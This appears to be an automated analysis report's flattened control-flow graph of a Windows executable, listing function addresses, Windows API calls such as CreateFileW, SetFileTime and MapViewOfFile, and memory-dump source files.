7577 412220 18 API calls 7576->7577 7580 7f8451 7577->7580 7581 7f8593 7578->7581 7582 7f8899 7579->7582 7583 411d20 14 API calls 7580->7583 7584 510740 51 API calls 7581->7584 7585 411e20 14 API calls 7582->7585 7586 7f8475 7583->7586 7587 7f85ad 7584->7587 7588 7f88b3 7585->7588 7591 411d20 14 API calls 7586->7591 7595 7f851f 7586->7595 7589 411d20 14 API calls 7587->7589 7590 40fec0 TlsGetValue 7588->7590 7589->7595 7592 7f88c5 7590->7592 7593 7f84a8 7591->7593 7594 411d20 14 API calls 7592->7594 7596 45e650 34 API calls 7593->7596 7597 7f88d8 7594->7597 7598 40fde0 TlsGetValue 7595->7598 7599 7f84be 7596->7599 7597->6973 7600 7f862b 7598->7600 7601 412220 18 API calls 7599->7601 7824 436880 7600->7824 7603 7f84f1 7601->7603 7813 510740 7603->7813 7604 7f8639 7606 7f87ff 7604->7606 7833 7f4670 7604->7833 7609 411d20 14 API calls 7606->7609 7617 7f8817 7609->7617 7610 411d20 14 API calls 7610->7595 7612 7f86ba 7613 411d20 14 API calls 7612->7613 7615 7f86dd 7613->7615 7618 45e650 34 API calls 7615->7618 7617->7560 7620 7f86f0 7618->7620 7622 412220 18 API calls 7620->7622 7624 7f8720 7622->7624 7626 411d20 14 API calls 7624->7626 7628 7f8749 7626->7628 7627 579ce0 81 API calls 7627->7612 7628->7606 7629 411d20 14 API calls 7628->7629 7630 7f8776 7629->7630 7631 45e650 34 API calls 7630->7631 7632 7f8789 7631->7632 7633 412220 18 API calls 7632->7633 7634 7f87b9 7633->7634 7863 579f50 7634->7863 7639 411d20 14 API calls 7639->7606 7641 411b70 TlsGetValue 7640->7641 7642 7f9158 7641->7642 7643 411b70 TlsGetValue 7642->7643 7644 7f916b 7643->7644 7645 411b70 TlsGetValue 7644->7645 7646 7f917b 7645->7646 7647 7f91c3 7646->7647 7648 440a70 33 API calls 7646->7648 7650 7f91ff 7647->7650 7651 440a70 33 API calls 7647->7651 7649 7f91bb 7648->7649 7652 40ef10 _purecall 7649->7652 7654 413560 14 API calls 7650->7654 7653 7f91f7 7651->7653 7652->7647 7656 40ef10 _purecall 7653->7656 7655 7f9222 7654->7655 7657 411d20 14 API calls 7655->7657 7656->7650 7658 7f9288 7657->7658 7659 45e650 34 API calls 7658->7659 7660 7f929b 7659->7660 7661 412220 18 API calls 7660->7661 7662 7f92cb 7661->7662 7663 411d20 14 API calls 7662->7663 7664 7f9304 7663->7664 7665 440a70 33 API calls 7664->7665 7668 7f934b 7664->7668 7666 7f9343 7665->7666 7667 40ef10 _purecall 7666->7667 7667->7668 7669 413390 18 API calls 7668->7669 7671 7f94cb 7669->7671 7670 7f9525 7673 411d20 14 API calls 7670->7673 7671->7670 7672 413390 18 API calls 7671->7672 7672->7670 7674 7f956c 7673->7674 7675 45e650 34 API calls 7674->7675 7676 7f957f 7675->7676 7677 412220 18 API calls 7676->7677 7678 7f95ac 7677->7678 7873 7fb0f0 7678->7873 7681 411d20 14 API calls 7682 7f9603 7681->7682 7683 7f9633 7682->7683 7684 40ced0 TlsGetValue 7682->7684 7685 411d20 14 API calls 7683->7685 7684->7683 7686 7f965d 7685->7686 7687 411e20 14 API calls 7686->7687 7688 7f8155 7687->7688 7688->7513 7692 7f7443 7689->7692 7698 7f74f9 7689->7698 7690 40fde0 TlsGetValue 7691 7f7519 7690->7691 7691->7519 7691->7521 7692->7698 7881 44b3d0 7692->7881 7694 7f74c7 7885 44b130 7694->7885 7696 7f74ec 7697 410430 TlsGetValue 7696->7697 7697->7698 7698->7690 7700 45e65d 7699->7700 7701 45e683 7700->7701 7702 440a70 33 API calls 7700->7702 7701->7528 7703 45e67b 7702->7703 7704 40ef10 _purecall 7703->7704 7704->7701 7706 7f543f 7705->7706 7707 7f545b 7706->7707 7708 7f544a 7706->7708 7709 44afb0 36 API calls 7707->7709 7943 44afb0 7708->7943 7711 7f5455 7709->7711 7712 44b130 51 API calls 7711->7712 7713 7f54a8 7712->7713 7714 410430 TlsGetValue 7713->7714 7715 7f54b5 7714->7715 7716 40fde0 TlsGetValue 7715->7716 7717 7f54bf 7716->7717 7718 40fde0 TlsGetValue 7717->7718 7719 7f54d3 7718->7719 7720 413560 14 API calls 7719->7720 7721 7f54e6 7720->7721 7721->7541 7723 442f1a 7722->7723 7724 442f42 7723->7724 7725 442f57 7723->7725 7726 410430 TlsGetValue 7724->7726 7727 443014 7725->7727 7728 442f68 7725->7728 7766 442f52 7726->7766 7729 4104b0 TlsGetValue 7727->7729 7947 434b10 7728->7947 7732 443024 7729->7732 7731 40fec0 TlsGetValue 7734 443761 7731->7734 7735 4104b0 TlsGetValue 7732->7735 7733 442f78 7952 434b60 7733->7952 7737 413560 14 API calls 7734->7737 7741 442fe9 7735->7741 7738 443774 7737->7738 7739 40fec0 TlsGetValue 7738->7739 7740 443786 7739->7740 7740->7525 7746 443059 7741->7746 7753 44313e 7741->7753 7742 442f99 7743 442fd6 7742->7743 7744 442feb 7742->7744 7745 4104b0 TlsGetValue 7743->7745 7747 434b10 TlsGetValue 7744->7747 7745->7741 7748 40fde0 TlsGetValue 7746->7748 7747->7741 7761 443062 7748->7761 7749 4431cb 7750 4431d4 7749->7750 7751 443741 7749->7751 7754 4431f5 7750->7754 7755 44332d 7750->7755 7752 410430 TlsGetValue 7751->7752 7752->7766 7753->7749 7758 413390 18 API calls 7753->7758 7756 4113d0 TlsGetValue 7754->7756 7757 4113d0 TlsGetValue 7755->7757 7756->7766 7757->7766 7758->7753 7759 4114b0 TlsGetValue 7759->7761 7761->7759 7762 4430be 7761->7762 7761->7766 7958 411190 7761->7958 7763 448740 TlsGetValue 7762->7763 7764 4430dd 7763->7764 7765 4114b0 TlsGetValue 7764->7765 7765->7766 7766->7731 7768 57a98c 7767->7768 7769 57a97a 7767->7769 7771 57a995 7768->7771 7777 57a9a7 7768->7777 7770 410430 TlsGetValue 7769->7770 7773 57a987 7770->7773 7774 410430 TlsGetValue 7771->7774 7772 57aa08 7964 57b7e0 7772->7964 7778 40fde0 TlsGetValue 7773->7778 7774->7773 7776 57aa11 7779 57aa22 7776->7779 7788 57aa31 7776->7788 7777->7772 7781 440a70 33 API calls 7777->7781 7785 57a9dc 7777->7785 7780 57aaa5 7778->7780 7782 410430 TlsGetValue 7779->7782 7780->7539 7783 57a9d4 7781->7783 7782->7773 7784 40ef10 _purecall 7783->7784 7784->7785 7785->7772 7786 440a70 33 API calls 7785->7786 7787 57aa00 7786->7787 7789 40ef10 _purecall 7787->7789 7790 57aa57 7788->7790 7791 57aa8a 7788->7791 7789->7772 7793 411190 TlsGetValue 7790->7793 7792 411580 TlsGetValue 7791->7792 7792->7773 7794 57aa68 7793->7794 7795 4116b0 TlsGetValue 7794->7795 7795->7773 7797 43742e 7796->7797 7973 448700 7797->7973 7801 43727f 7800->7801 7802 448740 TlsGetValue 7801->7802 7803 4372cd 7802->7803 7803->7550 7803->7551 7977 57ae50 SetLastError 7804->7977 7811 40fde0 TlsGetValue 7812 5792ce 7811->7812 7812->7550 7814 51076f 7813->7814 7815 413390 18 API calls 7814->7815 7817 5107d3 7815->7817 7816 51082d 7818 413560 14 API calls 7816->7818 7817->7816 8099 50f240 7817->8099 8102 510620 7817->8102 7819 51083e 7818->7819 7821 413560 14 API calls 7819->7821 7822 51084f 7821->7822 7822->7610 7825 411140 7824->7825 7826 436899 GetFileAttributesW 7825->7826 7827 43692d GetLastError 7826->7827 7828 4368ad 7826->7828 7832 4368bc 7827->7832 7829 4368d2 CreateFileW 7828->7829 7828->7832 7830 436915 GetLastError 7829->7830 7831 436909 CloseHandle 7829->7831 7830->7832 7831->7832 7832->7604 7834 7f46ad 7833->7834 7836 7f46e5 7834->7836 8123 43c060 7834->8123 7836->7612 7837 579f60 7836->7837 8134 57a260 7837->8134 7840 579ce0 7841 579d34 7840->7841 7844 579d3f 7840->7844 7842 4090f0 TlsGetValue 7841->7842 7842->7844 7843 579dd2 SetLastError 8204 436cd0 7843->8204 7845 4090f0 TlsGetValue 7844->7845 7848 579d77 7844->7848 7845->7848 7846 4090f0 TlsGetValue 7849 579daf 7846->7849 7848->7843 7848->7846 7849->7843 7850 579de7 7851 579e11 CreateFileW 7850->7851 7852 579e8f CloseHandle SetLastError 7851->7852 7853 579e4c SetFileTime 7851->7853 7854 409120 TlsGetValue 7852->7854 7853->7852 7855 579ea9 7854->7855 7856 409120 TlsGetValue 7855->7856 7857 579eb2 7856->7857 7858 409120 TlsGetValue 7857->7858 7859 579ebb 7858->7859 7860 579f70 7859->7860 7861 57a260 48 API calls 7860->7861 7862 579f7b 7861->7862 7862->7627 7864 57a260 48 API calls 7863->7864 7865 579f5b 7864->7865 7866 57a040 7865->7866 7867 57a058 7866->7867 8415 436de0 7867->8415 7871 411d20 14 API calls 7870->7871 7872 7f8aa4 7871->7872 7872->7617 7874 7fb10b 7873->7874 7875 7fb13a 7874->7875 7876 440a70 33 API calls 7874->7876 7877 412220 18 API calls 7875->7877 7878 7fb132 7876->7878 7879 7f95c1 7877->7879 7880 40ef10 _purecall 7878->7880 7879->7681 7880->7875 7882 44b3ec 7881->7882 7883 44b3de 7881->7883 7882->7694 7911 44bb90 7883->7911 7887 44b155 7885->7887 7886 44b184 7889 440c20 51 API calls 7886->7889 7891 44b1b8 7886->7891 7887->7886 7888 440a70 33 API calls 7887->7888 7892 44b17c 7888->7892 7893 44b1b0 7889->7893 7890 44b1f7 7896 44b24f 7890->7896 7900 440c20 51 API calls 7890->7900 7891->7890 7894 440c20 51 API calls 7891->7894 7897 40ef10 _purecall 7892->7897 7898 40ef10 _purecall 7893->7898 7895 44b1ef 7894->7895 7899 40ef10 _purecall 7895->7899 7925 44a6d0 7896->7925 7897->7886 7898->7891 7899->7890 7902 44b247 7900->7902 7904 40ef10 _purecall 7902->7904 7904->7896 7905 44b293 7906 4113d0 TlsGetValue 7905->7906 7910 44b29e 7906->7910 7907 440a70 33 API calls 7908 44b28b 7907->7908 7909 40ef10 _purecall 7908->7909 7909->7905 7910->7696 7913 44bbaa 7911->7913 7915 44b5e0 7913->7915 7914 44bbde 7914->7882 7919 44b608 7915->7919 7916 44b624 GetACP 7918 44b63f GetCPInfo 7916->7918 7917 44b632 7917->7918 7920 44b66d 7918->7920 7921 44b68a 7918->7921 7919->7916 7919->7917 7922 440a70 33 API calls 7920->7922 7921->7914 7923 44b682 7922->7923 7924 40ef10 _purecall 7923->7924 7924->7921 7926 44a700 7925->7926 7927 44a6de 7925->7927 7928 44a736 7926->7928 7929 440c20 51 API calls 7926->7929 7927->7926 7930 440a70 33 API calls 7927->7930 7932 440c20 51 API calls 7928->7932 7936 44a76c 7928->7936 7931 44a72e 7929->7931 7933 44a6f8 7930->7933 7934 40ef10 _purecall 7931->7934 7935 44a764 7932->7935 7938 40ef10 _purecall 7933->7938 7934->7928 7939 40ef10 _purecall 7935->7939 7937 44a7bb 7936->7937 7940 440c20 51 API calls 7936->7940 7937->7905 7937->7907 7938->7926 7939->7936 7941 44a7b3 7940->7941 7942 40ef10 _purecall 7941->7942 7942->7937 7944 44afc0 7943->7944 7945 44afda 7943->7945 7944->7945 7946 44bb90 36 API calls 7944->7946 7945->7711 7946->7945 7948 410430 TlsGetValue 7947->7948 7949 434b21 7948->7949 7951 434b2f 7949->7951 7961 4106f0 7949->7961 7951->7733 7953 434b73 7952->7953 7954 4100a0 TlsGetValue 7953->7954 7955 434b8c 7954->7955 7956 434ba2 7955->7956 7957 434b98 CharLowerBuffW 7955->7957 7956->7742 7957->7956 7959 4100a0 TlsGetValue 7958->7959 7960 4111aa 7959->7960 7960->7761 7962 410610 TlsGetValue 7961->7962 7963 4106f9 7962->7963 7963->7951 7967 57b0d0 7964->7967 7966 57b7eb 7966->7776 7968 57b0e8 7967->7968 7972 57b117 7967->7972 7969 440a70 33 API calls 7968->7969 7968->7972 7970 57b10f 7969->7970 7971 40ef10 _purecall 7970->7971 7971->7972 7972->7966 7974 44871c 7973->7974 7975 4117a0 TlsGetValue 7974->7975 7976 437442 7975->7976 7976->7538 7978 4374d0 2 API calls 7977->7978 7979 57ae7d GetLastError 7978->7979 7980 57ae86 7979->7980 7981 57aeb3 7979->7981 7980->7981 7983 43ea00 3 API calls 7980->7983 7982 40fde0 TlsGetValue 7981->7982 7984 5792b2 7982->7984 7985 57ae99 7983->7985 7989 579160 7984->7989 8022 440800 7985->8022 7987 57aeab 7988 40ef10 _purecall 7987->7988 7988->7981 8026 579bc0 7989->8026 7991 579180 7992 5791c4 7991->7992 8053 57aef0 7991->8053 7994 40fde0 TlsGetValue 7992->7994 7995 5791ce 7994->7995 8000 436a90 7995->8000 7996 57919a 7996->7992 7997 440a70 33 API calls 7996->7997 7998 5791bc 7997->7998 7999 40ef10 _purecall 7998->7999 7999->7992 8001 436abd 8000->8001 8002 436aee 8001->8002 8004 440a70 33 API calls 8001->8004 8094 442b60 8002->8094 8005 436adf 8004->8005 8007 40ef10 _purecall 8005->8007 8007->8002 8008 4104b0 TlsGetValue 8009 436b08 8008->8009 8010 436960 4 API calls 8009->8010 8012 436b13 8010->8012 8011 40fec0 TlsGetValue 8013 436b9f 8011->8013 8015 437200 TlsGetValue 8012->8015 8017 436b2a 8012->8017 8021 436b51 8012->8021 8014 40fde0 TlsGetValue 8013->8014 8016 436ba8 8014->8016 8015->8017 8016->7811 8018 437200 TlsGetValue 8017->8018 8017->8021 8019 436b6c 8018->8019 8020 436a90 38 API calls 8019->8020 8020->8021 8021->8011 8023 44081e 8022->8023 8024 410430 TlsGetValue 8023->8024 8025 440842 8024->8025 8025->7987 8068 57a3e0 8026->8068 8031 579c11 8081 434ce0 8031->8081 8032 440a70 33 API calls 8034 579c09 8032->8034 8036 40ef10 _purecall 8034->8036 8036->8031 8037 440a70 33 API calls 8038 579c3a 8037->8038 8041 40ef10 _purecall 8038->8041 8039 579c42 8040 579c6e 8039->8040 8042 440a70 33 API calls 8039->8042 8043 579ca3 8040->8043 8091 579a10 8040->8091 8041->8039 8045 579c66 8042->8045 8044 40fde0 TlsGetValue 8043->8044 8047 579cad 8044->8047 8048 40ef10 _purecall 8045->8048 8047->7991 8048->8040 8050 440a70 33 API calls 8051 579c9b 8050->8051 8052 40ef10 _purecall 8051->8052 8052->8043 8054 411190 TlsGetValue 8053->8054 8055 57af35 8054->8055 8056 411190 TlsGetValue 8055->8056 8057 57af46 8056->8057 8058 411580 TlsGetValue 8057->8058 8059 57af57 8058->8059 8060 4117a0 TlsGetValue 8059->8060 8061 57b068 8060->8061 8062 57b08a 8061->8062 8063 411190 TlsGetValue 8061->8063 8064 40fec0 TlsGetValue 8062->8064 8066 57b07d 8063->8066 8065 57b09a 8064->8065 8065->7996 8067 4114b0 TlsGetValue 8066->8067 8067->8062 8069 57a3ee 8068->8069 8070 579be7 8069->8070 8071 440a70 33 API calls 8069->8071 8074 57b460 8070->8074 8072 57a414 8071->8072 8073 40ef10 _purecall 8072->8073 8073->8070 8075 434ce0 TlsGetValue 8074->8075 8078 57b490 8075->8078 8076 40fec0 TlsGetValue 8077 579bf0 8076->8077 8077->8031 8077->8032 8079 411190 TlsGetValue 8078->8079 8080 57b4c3 8078->8080 8079->8080 8080->8076 8082 434cf9 8081->8082 8086 434d38 8082->8086 8088 434d29 8082->8088 8083 434d55 8084 40fde0 TlsGetValue 8083->8084 8087 434d36 8084->8087 8085 434d5f 8089 448740 TlsGetValue 8085->8089 8086->8083 8086->8085 8087->8037 8087->8039 8090 410430 TlsGetValue 8088->8090 8089->8087 8090->8087 8092 436960 4 API calls 8091->8092 8093 579a19 8092->8093 8093->8043 8093->8050 8095 410430 TlsGetValue 8094->8095 8096 442b70 8095->8096 8097 436afb 8096->8097 8098 4113d0 TlsGetValue 8096->8098 8097->8008 8098->8097 8105 50f260 8099->8105 8114 510640 8102->8114 8106 50f289 8105->8106 8108 440a70 33 API calls 8106->8108 8112 50f2b1 8106->8112 8107 50f251 8107->7817 8109 50f2a9 8108->8109 8110 40ef10 _purecall 8109->8110 8110->8112 8111 440a70 33 API calls 8111->8112 8112->8107 8112->8111 8113 40ef10 _purecall 8112->8113 8113->8112 8115 510669 8114->8115 8117 440a70 33 API calls 8115->8117 8120 510691 8115->8120 8116 510631 8116->7817 8118 510689 8117->8118 8119 40ef10 _purecall 8118->8119 8119->8120 8120->8116 8121 440a70 33 API calls 8120->8121 8122 40ef10 _purecall 8120->8122 8121->8120 8122->8120 8124 43c070 8123->8124 8126 43c0c1 8123->8126 8124->8126 8127 43bf60 8124->8127 8126->7836 8130 43bed0 8127->8130 8131 43bee3 8130->8131 8132 434200 51 API calls 8131->8132 8133 43bf19 8131->8133 8132->8133 8133->8126 8135 57a3e0 34 API calls 8134->8135 8136 57a297 8135->8136 8137 57b460 TlsGetValue 8136->8137 8138 57a2a0 8137->8138 8139 57a2c1 8138->8139 8140 440a70 33 API calls 8138->8140 8141 434ce0 TlsGetValue 8139->8141 8142 57a2b9 8140->8142 8143 57a2ce 8141->8143 8144 40ef10 _purecall 8142->8144 8145 440a70 33 API calls 8143->8145 8148 57a2f2 8143->8148 8144->8139 8146 57a2ea 8145->8146 8147 40ef10 _purecall 8146->8147 8147->8148 8149 57a31e 8148->8149 8150 440a70 33 API calls 8148->8150 8151 57ae50 7 API calls 8149->8151 8152 57a316 8150->8152 8153 57a32b 8151->8153 8154 40ef10 _purecall 8152->8154 8171 57aad0 8153->8171 8154->8149 8157 436960 4 API calls 8158 57a346 8157->8158 8159 57a367 8158->8159 8160 440a70 33 API calls 8158->8160 8161 57a39c 8159->8161 8201 57a070 8159->8201 8162 57a35f 8160->8162 8164 40fec0 TlsGetValue 8161->8164 8165 40ef10 _purecall 8162->8165 8167 579f6b 8164->8167 8165->8159 8167->7840 8168 440a70 33 API calls 8169 57a394 8168->8169 8170 40ef10 _purecall 8169->8170 8170->8161 8172 57ab26 8171->8172 8173 40fde0 TlsGetValue 8172->8173 8174 57ab33 8173->8174 8175 434ce0 TlsGetValue 8174->8175 8176 57ab43 8175->8176 8177 4104b0 TlsGetValue 8176->8177 8178 57ab53 8177->8178 8179 411190 TlsGetValue 8178->8179 8180 57ab64 8179->8180 8181 411190 TlsGetValue 8180->8181 8182 57ab75 8181->8182 8183 411580 TlsGetValue 8182->8183 8184 57ab86 8183->8184 8185 411190 TlsGetValue 8184->8185 8193 57abe6 8184->8193 8185->8193 8186 4117a0 TlsGetValue 8187 57ad8e 8186->8187 8188 410430 TlsGetValue 8187->8188 8189 57ad9e 8188->8189 8190 40fde0 TlsGetValue 8189->8190 8191 57ada8 8190->8191 8192 40fec0 TlsGetValue 8191->8192 8194 57adb8 8192->8194 8193->8186 8195 40fde0 TlsGetValue 8194->8195 8196 57adc1 8195->8196 8197 40fde0 TlsGetValue 8196->8197 8198 57adca 8197->8198 8199 40fde0 TlsGetValue 8198->8199 8200 57a338 8199->8200 8200->8157 8202 436880 5 API calls 8201->8202 8203 57a079 8202->8203 8203->8161 8203->8168 8205 411140 8204->8205 8206 436d01 GetFileAttributesW 8205->8206 8207 436d21 8206->8207 8208 436d84 8206->8208 8222 434060 8207->8222 8209 40fec0 TlsGetValue 8208->8209 8211 436d94 8209->8211 8212 40fde0 TlsGetValue 8211->8212 8213 436d9d 8212->8213 8213->7850 8214 436d34 8214->8208 8215 436d70 8214->8215 8216 437200 TlsGetValue 8214->8216 8217 436d79 GetFileAttributesW 8215->8217 8218 436d52 8216->8218 8217->8208 8235 442b00 8218->8235 8221 411580 TlsGetValue 8221->8215 8223 43408b 8222->8223 8224 434175 8223->8224 8225 436880 5 API calls 8223->8225 8224->8214 8226 4340a1 8225->8226 8226->8224 8240 436470 8226->8240 8228 4340b5 8228->8224 8229 4340ca GetFileAttributesW 8228->8229 8229->8224 8230 4340df 8229->8230 8230->8224 8231 434115 CreateFileW 8230->8231 8231->8224 8232 434150 8231->8232 8273 433d50 8232->8273 8236 410430 TlsGetValue 8235->8236 8237 442b10 8236->8237 8238 436d5f 8237->8238 8239 4114b0 TlsGetValue 8237->8239 8238->8221 8239->8238 8241 413390 18 API calls 8240->8241 8242 4364ca 8241->8242 8243 413390 18 API calls 8242->8243 8244 4364e8 8243->8244 8245 436960 4 API calls 8244->8245 8246 4364fe 8245->8246 8247 43650d 8246->8247 8248 436880 5 API calls 8246->8248 8251 436624 8247->8251 8307 4372f0 8247->8307 8248->8247 8253 417be0 33 API calls 8251->8253 8252 442b00 TlsGetValue 8254 436532 8252->8254 8255 436634 8253->8255 8257 43653e GetVolumeInformationW 8254->8257 8256 440800 TlsGetValue 8255->8256 8259 436646 8256->8259 8258 43661f 8257->8258 8263 436589 GetDriveTypeW 8257->8263 8317 443d70 GetLastError 8258->8317 8260 40ef10 _purecall 8259->8260 8264 4365e3 8260->8264 8263->8264 8265 40fec0 TlsGetValue 8264->8265 8266 43665e 8265->8266 8267 413560 14 API calls 8266->8267 8268 43666e 8267->8268 8269 413560 14 API calls 8268->8269 8270 43667e 8269->8270 8271 40fde0 TlsGetValue 8270->8271 8272 43668a 8271->8272 8272->8228 8274 40fde0 TlsGetValue 8273->8274 8279 433dbf 8274->8279 8275 433e67 8276 433e7d CreateFileMappingW 8275->8276 8277 433f6a 8275->8277 8276->8277 8278 433ebe MapViewOfFile 8276->8278 8280 433e5b 8277->8280 8347 433c00 8277->8347 8281 433ef1 GetCurrentProcess 8278->8281 8282 433f5d CloseHandle 8278->8282 8279->8275 8293 433e27 8279->8293 8285 40fec0 TlsGetValue 8280->8285 8344 4234a0 8281->8344 8282->8277 8288 433fe0 CloseHandle 8285->8288 8287 433f11 8290 433f50 UnmapViewOfFile 8287->8290 8292 411240 TlsGetValue 8287->8292 8288->8224 8289 410430 TlsGetValue 8291 433f96 8289->8291 8290->8282 8291->8280 8296 433aa0 TlsGetValue 8291->8296 8294 433f29 8292->8294 8295 411240 TlsGetValue 8293->8295 8297 433aa0 TlsGetValue 8294->8297 8298 433e3b 8295->8298 8300 433fb9 8296->8300 8301 433f39 8297->8301 8332 433aa0 8298->8332 8304 410430 TlsGetValue 8300->8304 8302 410430 TlsGetValue 8301->8302 8305 433f49 8302->8305 8304->8280 8305->8290 8306 410430 TlsGetValue 8306->8280 8308 437309 8307->8308 8309 437324 8308->8309 8314 437344 8308->8314 8312 4117a0 TlsGetValue 8309->8312 8310 4373f1 8311 40fde0 TlsGetValue 8310->8311 8313 436522 8311->8313 8312->8313 8313->8252 8314->8310 8315 437383 8314->8315 8316 4117a0 TlsGetValue 8315->8316 8316->8313 8320 443d90 8317->8320 8321 443e03 8320->8321 8322 443daf 8320->8322 8324 440a70 33 API calls 8321->8324 8323 43ea00 TlsGetValue FormatMessageW LocalFree 8322->8323 8325 443dc8 8323->8325 8326 443e01 8324->8326 8327 440c20 51 API calls 8325->8327 8328 40ef10 _purecall 8326->8328 8327->8326 8329 443e26 8328->8329 8330 40fde0 TlsGetValue 8329->8330 8331 443d82 8330->8331 8331->8251 8337 433ae1 8332->8337 8333 433b94 8334 40fec0 TlsGetValue 8333->8334 8335 433bc4 8334->8335 8335->8306 8336 411240 TlsGetValue 8336->8337 8337->8333 8337->8336 8338 433b41 8337->8338 8339 4111e0 TlsGetValue 8338->8339 8340 433b69 8339->8340 8341 4117a0 TlsGetValue 8340->8341 8342 433b83 8341->8342 8343 411580 TlsGetValue 8342->8343 8343->8333 8358 422f10 8344->8358 8346 4234ba 8346->8287 8348 40fde0 TlsGetValue 8347->8348 8350 433c24 8348->8350 8349 433ce7 8349->8289 8352 433c49 8350->8352 8406 4208c0 8350->8406 8352->8349 8353 4090f0 TlsGetValue 8352->8353 8355 433c98 8353->8355 8354 433cdd 8357 409120 TlsGetValue 8354->8357 8355->8354 8356 4111e0 TlsGetValue 8355->8356 8356->8354 8357->8349 8359 422f3f 8358->8359 8360 422f22 8358->8360 8359->8346 8360->8359 8361 4208c0 TlsGetValue GetProcAddress 8360->8361 8362 422f59 8361->8362 8363 4208c0 TlsGetValue GetProcAddress 8362->8363 8364 422f73 8363->8364 8365 4208c0 TlsGetValue GetProcAddress 8364->8365 8366 422f8d 8365->8366 8367 4208c0 TlsGetValue GetProcAddress 8366->8367 8368 422fa7 8367->8368 8369 4208c0 TlsGetValue GetProcAddress 8368->8369 8370 422fc1 8369->8370 8371 4208c0 TlsGetValue GetProcAddress 8370->8371 8372 422fdb 8371->8372 8373 4208c0 TlsGetValue GetProcAddress 8372->8373 8374 422ff5 8373->8374 8375 4208c0 TlsGetValue GetProcAddress 8374->8375 8376 42300f 8375->8376 8377 4208c0 TlsGetValue GetProcAddress 8376->8377 8378 423029 8377->8378 8379 4208c0 TlsGetValue GetProcAddress 8378->8379 8380 423043 8379->8380 8381 4208c0 TlsGetValue GetProcAddress 8380->8381 8382 42305d 8381->8382 8383 4208c0 TlsGetValue GetProcAddress 8382->8383 8384 423077 8383->8384 8385 4208c0 TlsGetValue GetProcAddress 8384->8385 8386 423091 8385->8386 8387 4208c0 TlsGetValue GetProcAddress 8386->8387 8388 4230ab 8387->8388 8389 4208c0 TlsGetValue GetProcAddress 8388->8389 8390 4230c5 8389->8390 8391 4208c0 TlsGetValue GetProcAddress 8390->8391 8392 4230df 8391->8392 8393 4208c0 TlsGetValue GetProcAddress 8392->8393 8394 4230f9 8393->8394 8395 4208c0 TlsGetValue GetProcAddress 8394->8395 8396 423113 8395->8396 8397 4208c0 TlsGetValue GetProcAddress 8396->8397 8398 42312d 8397->8398 8399 4208c0 TlsGetValue GetProcAddress 8398->8399 8400 423147 8399->8400 8401 4208c0 TlsGetValue GetProcAddress 8400->8401 8402 423161 8401->8402 8403 4208c0 TlsGetValue GetProcAddress 8402->8403 8404 42317b 8403->8404 8405 4208c0 TlsGetValue GetProcAddress 8404->8405 8405->8359 8407 4208ea GetProcAddress 8406->8407 8408 4208fd 8406->8408 8409 420931 8407->8409 8410 4109e0 TlsGetValue 8408->8410 8411 40fe30 TlsGetValue 8409->8411 8413 42090e 8410->8413 8412 42093b 8411->8412 8412->8352 8414 40fe30 TlsGetValue 8413->8414 8414->8409 8416 4104b0 TlsGetValue 8415->8416 8417 436e26 8416->8417 8418 436e9e 8417->8418 8419 436e38 GetFileAttributesW 8417->8419 8420 436ea7 SetFileAttributesW 8418->8420 8419->8418 8421 436e48 8419->8421 8422 436eb6 GetLastError 8420->8422 8423 436ebe 8420->8423 8424 434060 74 API calls 8421->8424 8422->8423 8425 40fec0 TlsGetValue 8423->8425 8427 436e55 8424->8427 8426 436ece 8425->8426 8426->7639 8427->8418 8428 436e91 8427->8428 8429 437200 TlsGetValue 8427->8429 8430 4104b0 TlsGetValue 8428->8430 8431 436e73 8429->8431 8430->8418 8432 442b00 TlsGetValue 8431->8432 8433 436e80 8432->8433 8434 411580 TlsGetValue 8433->8434 8434->8428 8436 7f4953 8435->8436 8437 7f4978 8436->8437 8438 440a70 33 API calls 8436->8438 8441 7f48d0 8437->8441 8439 7f496c 8438->8439 8440 40edf0 _purecall 8439->8440 8440->8437 8443 7f48f4 8441->8443 8442 7f4919 8442->7001 8443->8442 8444 440a70 33 API calls 8443->8444 8445 7f490d 8444->8445 8446 40edf0 _purecall 8445->8446 8446->8442 8448 7f484d 8447->8448 8449 7f488f 8448->8449 8450 440a70 33 API calls 8448->8450 8451 413560 14 API calls 8449->8451 8452 7f4883 8450->8452 8453 7f48a0 8451->8453 8454 40edf0 _purecall 8452->8454 8453->6983 8454->8449 8456 40ff78 Sleep 8455->8456 8456->7028 8457 417be0 8458 417c0d 8457->8458 8465 417c47 8457->8465 8459 417c17 8458->8459 8460 417c49 8458->8460 8461 413d70 33 API calls 8459->8461 8462 4111e0 TlsGetValue 8460->8462 8463 417c22 8461->8463 8462->8465 8464 4100a0 TlsGetValue 8463->8464 8464->8465

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
